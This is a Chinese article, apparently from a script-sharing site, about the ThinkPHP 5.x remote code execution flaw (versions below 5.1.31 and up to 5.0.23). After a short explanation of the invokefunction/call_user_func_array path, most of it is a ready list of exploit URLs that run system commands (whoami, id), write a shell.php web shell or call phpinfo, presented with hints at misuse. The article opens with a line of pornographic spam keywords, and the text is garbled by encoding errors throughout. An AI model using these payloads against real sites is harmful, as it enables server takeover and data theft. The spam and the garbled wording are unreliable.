欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決

  發(fā)布時(shí)間:2018-12-12 11:30:45   作者:City   我要評(píng)論
本文來(lái)介紹一下thinkphp官方修復(fù)的一個(gè)getshell漏洞,框架對(duì)控制器沒(méi)有進(jìn)行足夠的檢測(cè)導(dǎo)致的一處getshell,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧

先來(lái)簡(jiǎn)單說(shuō)說(shuō)前天thinkphp官方修復(fù)的一個(gè)getshell漏洞,框架對(duì)控制器沒(méi)有進(jìn)行足夠的檢測(cè)導(dǎo)致的一處getshell

影響的范圍: 5.x < 5.1.31, <= 5.0.23

漏洞危害: 導(dǎo)致系統(tǒng)被提權(quán)(你懂的)

這里附上一個(gè)自己測(cè)試的 thinkphp的 鏈接  http://www.thinkphp.cn/download/1260.html  版本是5.0.22

先來(lái)講下,5.0 跟5.1的區(qū)別吧,tp5.1中引入了容器(Container)和門面(Facade)這兩個(gè)新的類  tp5.0是沒(méi)有這兩個(gè)新的類的,

漏洞原理

URL:http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction

我們先來(lái)看看App類里的 exec函數(shù)里的執(zhí)行分層控制器的操作

我們這里是把controller 的調(diào)用信息跟配置信息全部傳到了 invokeFunction 這個(gè) 執(zhí)行函數(shù)里面去了

因?yàn)閠hink\App是第二個(gè)入口,在tp運(yùn)行的時(shí)候就會(huì)被加載 所以用think\App里面的分層控制器的執(zhí)行操作的時(shí)候,需要去調(diào)用invokeFunction這個(gè)函數(shù)。

這個(gè)函數(shù)有兩個(gè)參數(shù),如上圖所示,第一個(gè)是函數(shù)的名字,第二個(gè)參數(shù)數(shù)組,比如$function傳入BaiDu然后$vars傳入[12,555]就相當(dāng)于調(diào)用BaiDu(12,555)

此處我們把function傳入call_user_func_array然后vars[0]傳入我們要執(zhí)行的函數(shù)的名字vars[1]傳入要執(zhí)行函數(shù)的參數(shù),因?yàn)関ars是個(gè)數(shù)組 所以此處我們的get請(qǐng)求需要這樣寫

vars[]=函數(shù)名&vars[1][]=參數(shù)

此處是利用php的數(shù)組注入

此時(shí)此刻就可以開(kāi)始利用遠(yuǎn)程代碼執(zhí)行漏洞了 比如我們要執(zhí)行system函數(shù) 他的參數(shù)是whoami

http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

下面你懂的,作為一個(gè)接班人我們要做的就是修復(fù)他(為所欲為?),當(dāng)然官方更新的最新版本是已經(jīng)修復(fù)了的

這里就代碼執(zhí)行成功,以下奉獻(xiàn)上tp不同版本的payload

?s=index/\think\Request/input&filter=phpinfo&data=1
?s=index/\think\Request/input&filter=system&data=id
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=
?s=index/\think\view\driver\Php/display&content=
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。

相關(guān)文章

最新評(píng)論